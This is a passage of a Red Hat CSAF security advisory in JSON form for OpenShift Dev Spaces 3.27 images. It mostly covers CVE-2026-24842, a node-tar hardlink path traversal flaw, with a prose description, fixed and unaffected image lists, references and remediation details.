"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "wheel: wheel: Privilege Escalation or Arbitrary Code Execution via malicious wheel file unpacking"
},
{
"cve": "CVE-2026-24842",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-01-28T01:01:16.886629+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2433645"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in node-tar, a Node.js module for handling TAR archives. This vulnerability allows a remote attacker to bypass path traversal protections by crafting a malicious TAR archive. The security check for hardlink entries uses different path resolution logic than the actual hardlink creation, enabling the attacker to create hardlinks to arbitrary files outside the intended extraction directory. This could lead to unauthorized information disclosure or further system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an IMPORTANT vulnerability in node-tar, a Node.js module for handling TAR archives. The flaw allows an attacker to bypass path traversal protections by crafting a malicious TAR archive. This could lead to the creation of hardlinks to arbitrary files outside the intended extraction directory, potentially resulting in unauthorized information disclosure or further system compromise in affected Red Hat products utilizing node-tar for archive processing.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24842"
},
{
"category": "external",
"summary": "RHBZ#2433645",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433645"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24842",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24842"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46",
"url": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"
},
{
"category": "external",
"summary": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v",
"url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"
}
],
"release_date": "2026-01-28T00:20:13.261000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
